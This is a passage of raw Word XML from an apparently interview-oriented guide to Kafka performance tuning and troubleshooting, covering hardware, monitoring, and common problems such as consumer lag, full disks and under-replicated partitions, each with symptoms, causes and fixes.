        <w:t>: This sets the maximum amount of data that a consumer can fetch in a single request. Adjust this based on the consumer’s memory capacity and throughput requirements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE9C74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Max Poll Interval (max.poll.interval.ms)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058E3EEB" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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Interval</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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Ensuring Adequate Hardware Resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A616B0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performance is also heavily influenced by the underlying hardware infrastructure. Ensure that your Kafka cluster is running on high-performance hardware and properly scaled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4653E21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Disk I/O (SSD vs. HDD)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1500BF" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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Kafka benefits from fast disk I/O, so using </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SSDs</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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emory (RAM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF6A42C" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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brokers, producers, and consumers should have sufficient memory to handle caching and processing without frequent garbage collection (GC) pauses. Kafka uses the </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>OS page cache</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for data storage, so ensure that brokers have enough memory for efficient data access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3705180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PU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5977C1E6" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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benefit from multi-core processors, as they can handle multiple threads concurrently. Ensure that the CPU is capable of handling the number of partitions, consumers, and network traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625669F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Throughput</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282C51FF" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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ing and Fine-Tuning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC4CF9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essential to ensure optimal performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5D6F6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JMX Metrics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E86E907" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JMX metrics</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that allow you to monitor various performance indicators like throughput, latency, consumer lag, disk I/O, and network throughput. Use monitoring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visualize and alert on important metrics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A696F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Garbage Collection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FB8C3B" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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Garbage Collection</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can become a bottleneck in Kafka, especially when handling large volumes of data. Tune the JVM settings to minimize GC overhead. For example, use the </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>G1GC</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> garbage collector for better handling of larger heaps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323F73F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luster Rebalancing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474FF3D0" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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the cluster to ensure an even distribution of partitions across brokers. Rebalance partitions if necessary to avoid any broker from becoming a bottleneck.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614957C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5B9C96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480" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="39447EB7" w14:textId="0CAE6930" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="00591665" w:rsidP="00DB22BB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="869" w:name="_Toc197868083"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are common Kafka issues and how can they be fixed</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="869"/>
    </w:p>
    <w:p w14:paraId="12F27883" w14:textId="3A7CD639" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03"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list of </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>common Kafka issues</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> you might encounter in production, along with </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>explan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ixes</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for each:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B05F7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F7E0A">
          <v:rect id="_x0000_i3481" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F05441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Consumer Lag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7812367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6DBF7234"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not being processed in real time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648D171F"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ag increasing in Kafka monitoring tools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BCDF33"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4FCB6053"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low consumer processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483B1DDA"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ot enough consumers in a consumer group.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF51BE6"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I/O bottlenecks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3C0904"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632BCB6"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the number of consumers (match or exceed partition count).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437E7F4A"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for faster processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E6064F"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max.poll.records or fetch.min.bytes if needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218CE908"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max.poll.interval.ms and session.timeout.ms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D493B3"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31B80">
          <v:rect id="_x0000_i3482" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="373311E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Broker Out of Disk Space</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4340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58154B05"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stops accepting messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43EBE9AA"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s in broker logs about insufficient disk.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6FF95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EBD95F5"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ention policies not tuned properly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2ED4E9"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y high throughput without cleanup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AAC0B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0EAF1C2C"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and lower log.retention.hours or log.retention.bytes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED87D9B"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action or compression (compression.type=snappy/gzip).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025787F1"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d more storage or scale out brokers to distribute load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7306D9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2DD7B">
          <v:rect id="_x0000_i3483" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E34D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nder-Replicated Partitions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732DFB8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616923A"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shows under-replicated partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF49967"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isk of data loss if a broker fails.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44ADF8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1254E67"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down or slow to respond.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3DB80E"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partition or high disk I/O.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCAEDD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D133B94"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broker health and restart failed instances.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E17AE0"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plica.fetch.max.bytes or replica.lag.time.max.ms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7633C29B"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ISR (in-sync replicas) configuration is appropriate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABDAF57"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87ABAD">
          <v:rect id="_x0000_i3484" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FC805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06D4340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5DC4FF4" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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ame message processed multiple times by consumer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF3F69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D47EC7B"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retries can lead to duplicates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B47D432"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not committing offsets properly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA44DC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3483C9C"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able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able.idempotence=true).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5549EF6F"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EOS) if required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10734919"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offset commits are done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is successful.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C7FA6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1C637">
          <v:rect id="_x0000_i3485" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDE35B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6ABF36F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4ADB119" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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sing messages between producer and consumer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566FEB7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EA916D7"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producer crashes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DDEB14"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committing offsets before successful processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77904836"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52F39AC"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min.insync.replicas=2 for durability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC477A4"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nly commit offsets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and persistence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2EA7AC"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E18ED">
          <v:rect id="_x0000_i3486" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE323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Broker Crashes or OOM Errors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E2A4F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8DFFBAA"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JVM crashes or restarts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C6715D"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF7D70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4FFE927"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 per broker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A041F4"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oor JVM heap settings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770EFDBC"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backlog (consumers not keeping up).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15291C2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52A75A9"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28F0BEA5"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size and garbage collector (G1GC recommended).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CE8926"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brokers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C703C0A"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0FF19FC">
          <v:rect id="_x0000_i3487" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BC1F2D"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High Latency or Low Throughput</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1404E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C648F11"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or consumers show delays.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D12DEE"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ecomes sluggish.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDBEA7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EBF8DE1"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linger.ms set too low.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B2F43D"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k or network bottlenecks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D50999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821BA29"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batch.size, linger.ms, and enable compression.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EF6B45"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SSDs for broker logs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF30EA1"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and improve disk/network performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16852B2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4A2F4">
          <v:rect id="_x0000_i3488" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD549E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Connection Issues</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8077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7C55D5"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connect to ZooKeeper.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F59D60"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luster fails to form or elect a leader.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA3534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6BE97C0"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issues, incorrect ZooKeeper connect strings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D042C4"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des down.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489E44E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AC51FE3"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ify ZooKeeper status (zkServer.sh status).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7765317C"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all nodes are reachable and have proper configs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00286327"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der migrating to KRaft mode in newer Kafka versions (no ZooKeeper).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28708172"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C2C47">
          <v:rect id="_x0000_i3489" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F22C7A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Offset Commit Failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745361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D294D3"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reprocesses same messages after restart.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A42F74"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commit failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBD55F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D9718D5"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rashes before committing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A056DB"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 commit is on but too frequent or too slow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A30E13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03D6DD3"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offset commit</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with proper error handling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAB05E0"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auto.commit=false and commit after successful processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0D547E"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7B7E20">
          <v:rect id="_x0000_i3490" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6F31BF"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Topic Configuration Mistakes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD473A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A64E272"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neven load distribution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B500C07"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loss due to too low replication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68EA2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B2D1BDC"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partitions or replication factor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C92C960"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fault settings used without tuning.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7644247D"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2F38CD97"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topic configs: partition count, replication, retention, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3133EF33"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kafka-topics.sh --describe to audit topics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BDF88B" w14:textId="24ED0C3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491" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F4999A" w14:textId="41F4BBD7" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="001B4C3B" w:rsidP="00DB22BB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="870" w:name="_Toc197868084"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>List common Kafka problems, such as disk full errors, under-replicated partitions, and slow consumers, and explain how to resolve them</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="870"/>
    </w:p>
    <w:p w14:paraId="004114CD" w14:textId="3DBF32D1" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58A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detailed list of </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>common Kafka problems</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, including </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>symptoms, causes, and resolutions</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which is helpful for both interviews and real-world troubleshooting:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC7B3B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570280">
          <v:rect id="_x0000_i3492" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1745887D"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Disk Full Errors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6191D696"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2E214A8"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brokers stop accepting messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263F348B"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segments cannot be created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CF8539"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 logs show No space left on device.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7136B58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ADF8D88"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retention policies not configured properly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4573F2"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without log cleanup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7DE713"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topics/partitions without log compaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0516ADC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215781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log.retention.hours or log.retention.bytes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CAD1187"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ression (compression.type=snappy/gzip).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3686359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lete unused topics or old data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C2E1FB"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and disk capacity or use log directories on multiple disks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30644B4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7AE42">
          <v:rect id="_x0000_i3493" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A7B3C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nder-Replicated Partitions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A80DB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8220E93"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describe shows under-replicated partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D95FDFD"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at risk of reading stale or incomplete data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3D8B8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2A1FACB7"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 brokers are down or slow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C31B210"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 between brokers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3988D186"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follower brokers can't keep up with leader.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DAE6F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78DC1B3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failed or slow brokers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0C629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and improve broker network and disk performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092E5C60"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529A807A"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fetch.max.bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3FAB9B"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lag.time.max.ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A70047"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in.insync.replicas is less than or equal to the number of available brokers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC2424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B4F7EF">
          <v:rect id="_x0000_i3494" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D75E7F2"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Slow Consumers (High Consumer Lag)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F503D3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48CB55"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consumer lag metrics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AD54BE"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delayed for end users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F98E731"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lag keeps growing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27EA51C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634F958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processing is slower than message ingestion rate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F29621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consumer instances.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A60A90"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ensive message processing logic.</w:t>
      </w:r>
    </w:p>
